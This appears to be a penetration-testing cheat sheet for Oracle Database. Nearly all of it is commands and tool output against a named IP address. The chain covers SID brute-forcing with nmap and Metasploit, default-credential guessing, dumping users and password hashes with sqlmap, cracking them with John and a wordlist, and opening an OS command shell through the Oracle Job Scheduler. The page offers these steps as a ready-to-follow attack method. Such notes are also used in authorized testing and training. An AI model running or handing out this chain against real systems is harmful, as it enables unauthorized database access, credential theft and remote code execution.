Oracle Database
Oracle Database¶
SID Enumeration¶
Nmap SID Enumeration:
>>> sudo nmap 167.172.146.34 -p 1521 -sS --script oracle-sid-brute
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-30 18:20 EDT
Nmap scan report for 167.172.146.34
Host is up (0.010s latency).
PORT STATE SERVICE
1521/tcp open oracle
| oracle-sid-brute:
|_ XE
MSF SID Enumeration:
>>> msfconsole -q
msf5 > use auxiliary/scanner/oracle/sid_brute
msf5 auxiliary(scanner/oracle/sid_brute) > setg RHOSTS 167.172.146.34
RHOSTS => 167.172.146.34
msf5 auxiliary(scanner/oracle/sid_brute) > set VERBOSE false
VERBOSE => false
msf5 auxiliary(scanner/oracle/sid_brute) > run
[*] 167.172.146.34:1521 - Checking 571 SIDs against 167.172.146.34:1521
[+] 167.172.146.34:1521 - 167.172.146.34:1521 Oracle - 'XE' is valid
[+] 167.172.146.34:1521 - 167.172.146.34:1521 Oracle - 'PLSEXTPROC' is valid
[*] 167.172.146.34:1521 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
User/Password Enumeration¶
>>> python3 opec.py -t 167.172.146.34 -s XE
[i] Creating privilege escalation report ./logs/opec-privesc-log-2020-Jul-30_19-03-52.log
[*] Testing commencing.
[i] Enter CNTRL+C at any time to stop brute forcing default credentials
[i] Checked 10 of 169 accounts
[i] Checked 20 of 169 accounts
[i] Checked 30 of 169 accounts
[i] Checked 40 of 169 accounts
[+] Default account credentials: FROSTY/SNOWMAN
[i] Checked 50 of 169 accounts
[i] Checked 60 of 169 accounts
[i] Checked 70 of 169 accounts
[i] Checked 80 of 169 accounts
[i] Checked 90 of 169 accounts
[i] Checked 100 of 169 accounts
[i] Checked 110 of 169 accounts
[i] Checked 120 of 169 accounts
[i] Checked 130 of 169 accounts
[i] Checked 140 of 169 accounts
[i] Checked 150 of 169 accounts
[i] Checked 160 of 169 accounts
Connection to Database¶
Using SQLPlus:
Using SQLMAP:
>>> sqlmap -d oracle://FROSTY:[email protected]:1521/XE -a --flush-session
___
__H__
___ ___[.]_____ ___ ___ {1.4.4#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:16:12 /2020-07-30/
[20:16:13] [INFO] flushing session file
[20:16:13] [INFO] connection to Oracle server '167.172.146.34:1521' established
[20:16:13] [INFO] testing Oracle
[20:16:13] [INFO] confirming Oracle
[20:16:13] [INFO] the back-end DBMS is Oracle
[20:16:13] [INFO] fetching banner
back-end DBMS: Oracle
banner: 'Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production'
[20:16:13] [INFO] fetching current user
current user: 'FROSTY'
[20:16:13] [INFO] fetching current database
[20:16:13] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current database (equivalent to schema on Oracle): 'FROSTY'
[20:16:13] [INFO] fetching server hostname
hostname: 'localhost.localdomain'
[20:16:13] [INFO] testing if current user is DBA
current user is DBA: True
[20:16:13] [INFO] fetching database users
database management system users [13]:
[*] ANONYMOUS
[*] APEX_040000
[*] APEX_PUBLIC_USER
[*] CTXSYS
[*] FLOWS_FILES
[*] FROSTY
[*] HR
[*] MDSYS
[*] OUTLN
[*] SYS
[*] SYSTEM
[*] XDB
[*] XS$NULL
[20:16:13] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:16:16] [INFO] writing hashes to a temporary file '/tmp/sqlmapoq9zmkay9814/sqlmaphashes-if2xq68v.txt'
Cracking Hashes¶
Cracking Hashes with John:
>>> john /tmp/sqlmapoq9zmkay9814/sqlmaphashes-if2xq68v.txt --wordlist=/opt/Hacking/Enumeration/SecurityLists/Passwords/rockyou.txt --format=oracle
Using default input encoding: UTF-8
Loaded 12 password hashes with 12 different salts (oracle, Oracle 10 [DES 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ORACLE (XDB)
ORACLE (CTXSYS)
SNOWMAN (FROSTY)
3g 0:00:01:41 DONE (2020-07-30 20:19) 0.02969g/s 141961p/s 1278Kc/s 1278KC/s "CATRINA"..*7¡VAMOS!
RCE¶
Use Option 7 to get a shell.
Use Oracle Jobs to launch a shell:
>>> opec.py -t 192.168.89.2 -s ORCL -u SYS -p password1 -m s
[i] Please select from the following options:
[1] Get current privilege information
[2] Get procedures and functions information
[3] Get dangerous package information
[4] Launch a SQL shell at the current privilege level
[5] Launch the data browser for viewing row-level data
[6] Launch an OS commanding shell via Java (this will write files on host OS)
[7] Launch an OS commanding shell via the Job Scheduler (this will write files on host OS)
[8] Deploy a simple port scanner package
[9] Launch a privilege escalation session as the current user
[10] Exit shell mode
Your selection: 7
[i] x86_64/Linux 2.4.xx
[i] Linux OS inferred
[i] Oracle version 11
[i] Error:
CREATE DIRECTORY MY_DIR2346E AS '/tmp/'
*
ERROR at line 1:
ORA-00955: name is already used by an existing object
[i] CREATE DIRECTORY MY_DIR2346E AS '/tmp/' *ERROR at line 1:ORA-00955: name is already used by an existing object
[i] Grant succeeded.
[i] Grant succeeded.
[i] Please note:
[i] - Each command is executed as an individual scheduled job
[i] - State is not maintained between shell commands
[i] - Please exit the shell correctly so OPEC can remove any files
[+] Launching shell - type exit and press return to escape the shell
> hostname
localhost.localdomain
> id
uid=1002(oracle) gid=1002(dba) groups=1002(dba) context=unconfined_u:system_r:initrc_t:s0